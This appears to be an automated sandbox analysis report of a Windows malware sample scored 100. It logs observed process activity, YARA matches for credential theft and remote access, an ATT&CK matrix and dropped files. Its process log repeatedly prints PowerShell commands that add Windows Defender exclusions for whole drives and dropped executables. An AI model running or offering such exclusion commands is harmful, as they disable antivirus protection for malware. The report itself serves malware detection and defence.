                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files (x86)/'
                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/ProgramData/'
                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/'
                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/System Volume Information/'
                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/'
                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/'
                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\autoit3\Icons\XrtbrRarCSNElLBNKqySVVhxSZIi.exe'
                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\windows portable devices\RuntimeBroker.exe'
                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\windows media player\Network Sharing\XrtbrRarCSNElLBNKqySVVhxSZIi.exe'
                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\en-US\XrtbrRarCSNElLBNKqySVVhxSZIi.exe'
                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\XrtbrRarCSNElLBNKqySVVhxSZIi.exe'
                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe'
                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\0sp3gwcw\0sp3gwcw.cmdline"
                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\4gjcegjf\4gjcegjf.cmdline"
                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/'
                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/'
                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$WinREAgent/'
                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/'
                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/PerfLogs/'
                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files/'
                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files (x86)/'
                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/ProgramData/'
                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/'
                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/System Volume Information/'
                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/'
                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/'
                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\autoit3\Icons\XrtbrRarCSNElLBNKqySVVhxSZIi.exe'
                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\windows portable devices\RuntimeBroker.exe'
                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\windows media player\Network Sharing\XrtbrRarCSNElLBNKqySVVhxSZIi.exe'Jump to behavior
                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\en-US\XrtbrRarCSNElLBNKqySVVhxSZIi.exe'Jump to behavior
                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\XrtbrRarCSNElLBNKqySVVhxSZIi.exe'Jump to behavior
                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe'Jump to behavior
                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\1ke8OVZbVo.bat" Jump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RES6986.tmp" "c:\Program Files (x86)\Microsoft\Edge\Application\CSC2072A4DD6B9C45BD955850FB555C1F90.TMP"Jump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RES6B99.tmp" "c:\Windows\System32\CSC5918AA24663347D392372538DC1C654.TMP"Jump to behavior
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                          Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exeQueries volume information: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe VolumeInformation
                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                          Source: C:\Program Files (x86)\AutoIt3\Icons\XrtbrRarCSNElLBNKqySVVhxSZIi.exeQueries volume information: C:\Program Files (x86)\AutoIt3\Icons\XrtbrRarCSNElLBNKqySVVhxSZIi.exe VolumeInformation
                          Source: C:\Program Files (x86)\Windows Portable Devices\RuntimeBroker.exeQueries volume information: C:\Program Files (x86)\Windows Portable Devices\RuntimeBroker.exe VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe | Queries volume information: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe | VolumeInformation
Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe | Queries volume information: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe | VolumeInformation
Source: C:\Windows\System32\cmd.exe | Queries volume information: C:\ | VolumeInformation
Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                          Stealing of Sensitive Information

Source: Yara match | File source: 00000000.00000002.1566189118.0000000013111000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: 4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe PID: 6700, type: MEMORYSTR
Source: Yara match | File source: 4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe, type: SAMPLE
Source: Yara match | File source: 0.0.4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe.a60000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000000.1239399046.0000000000A62000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: C:\Program Files (x86)\AutoIt3\Icons\XrtbrRarCSNElLBNKqySVVhxSZIi.exe, type: DROPPED
Source: Yara match | File source: C:\Program Files (x86)\Windows Portable Devices\RuntimeBroker.exe, type: DROPPED
Source: Yara match | File source: 4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe, type: SAMPLE
Source: Yara match | File source: 0.0.4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe.a60000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: C:\Program Files (x86)\AutoIt3\Icons\XrtbrRarCSNElLBNKqySVVhxSZIi.exe, type: DROPPED
Source: Yara match | File source: C:\Program Files (x86)\Windows Portable Devices\RuntimeBroker.exe, type: DROPPED

                          Remote Access Functionality

                           Source: Yara match | File source: 00000000.00000002.1566189118.0000000013111000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                           Source: Yara match | File source: Process Memory Space: 4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe PID: 6700, type: MEMORYSTR
                           Source: Yara match | File source: 4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe, type: SAMPLE
                           Source: Yara match | File source: 0.0.4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe.a60000.0.unpack, type: UNPACKEDPE
                           Source: Yara match | File source: 00000000.00000000.1239399046.0000000000A62000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                           Source: Yara match | File source: C:\Program Files (x86)\AutoIt3\Icons\XrtbrRarCSNElLBNKqySVVhxSZIi.exe, type: DROPPED
                           Source: Yara match | File source: C:\Program Files (x86)\Windows Portable Devices\RuntimeBroker.exe, type: DROPPED
                           Source: Yara match | File source: 4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe, type: SAMPLE
                           Source: Yara match | File source: 0.0.4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe.a60000.0.unpack, type: UNPACKEDPE
                           Source: Yara match | File source: C:\Program Files (x86)\AutoIt3\Icons\XrtbrRarCSNElLBNKqySVVhxSZIi.exe, type: DROPPED
                           Source: Yara match | File source: C:\Program Files (x86)\Windows Portable Devices\RuntimeBroker.exe, type: DROPPED
                           MITRE ATT&CK Matrix
                           Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
                           Gather Victim Identity Information | 1 Scripting | Valid Accounts | 11 Windows Management Instrumentation | 1 Scripting | 11 Process Injection | 32 Masquerading | OS Credential Dumping | 11 Security Software Discovery | 1 Taint Shared Content | 11 Archive Collected Data | 1 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features
                           Credentials | Domains | Default Accounts | Scheduled Task/Job | 41 Registry Run Keys / Startup Folder | 41 Registry Run Keys / Startup Folder | 11 Disable or Modify Tools | LSASS Memory | 1 Process Discovery | Remote Desktop Protocol | Data from Removable Media | Junk Data | Exfiltration Over Bluetooth | Network Denial of Service
                           Email Addresses | DNS Server | Domain Accounts | At | 1 DLL Side-Loading | 1 DLL Side-Loading | 31 Virtualization/Sandbox Evasion | Security Account Manager | 31 Virtualization/Sandbox Evasion | SMB/Windows Admin Shares | Data from Network Shared Drive | Steganography | Automated Exfiltration | Data Encrypted for Impact
                           Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 11 Process Injection | NTDS | 1 Application Window Discovery | Distributed Component Object Model | Input Capture | Protocol Impersonation | Traffic Duplication | Data Destruction
                           Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 Deobfuscate/Decode Files or Information | LSA Secrets | 2 File and Directory Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
                           Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 2 Obfuscated Files or Information | Cached Domain Credentials | 14 System Information Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
                           DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 12 Software Packing | DCSync | Remote System Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
                           Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 1 DLL Side-Loading | Proc Filesystem | System Owner/User Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
                           Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 1 File Deletion | /etc/passwd and /etc/shadow | Network Sniffing | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement
                           Behavior Graph ID: 1510313 | Sample: 4ceb69afc05b1475459075f2cd5... | Startdate: 12/09/2024 | Architecture: WINDOWS | Score: 100
                           Top-level signatures: Suricata IDS alerts for network traffic; Antivirus detection for dropped file; Antivirus / Scanner detection for submitted sample; 13 other signatures
                           Process tree recovered from the behavior graph:
                           4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe (started)
                             dropped: C:\...\XrtbrRarCSNElLBNKqySVVhxSZIi.exe (PE32); C:\Users\user\Desktop\ynMPgItS.log (PE32); C:\Users\user\Desktop\yEThvdnU.log (PE32); 14 other malicious files
                             signatures: Creates an undocumented autostart registry key; Creates autostart registry keys with suspicious names; Creates multiple autostart registry keys; 3 other signatures
                             csc.exe (started)
                               dropped: C:\Program Files (x86)\...\msedge.exe (PE32)
                               signature: Infects executable files (exe, dll, sys, html)
                               conhost.exe (started); cvtres.exe (started)
                             csc.exe (started)
                               dropped: C:\Windows\...\SecurityHealthSystray.exe (PE32)
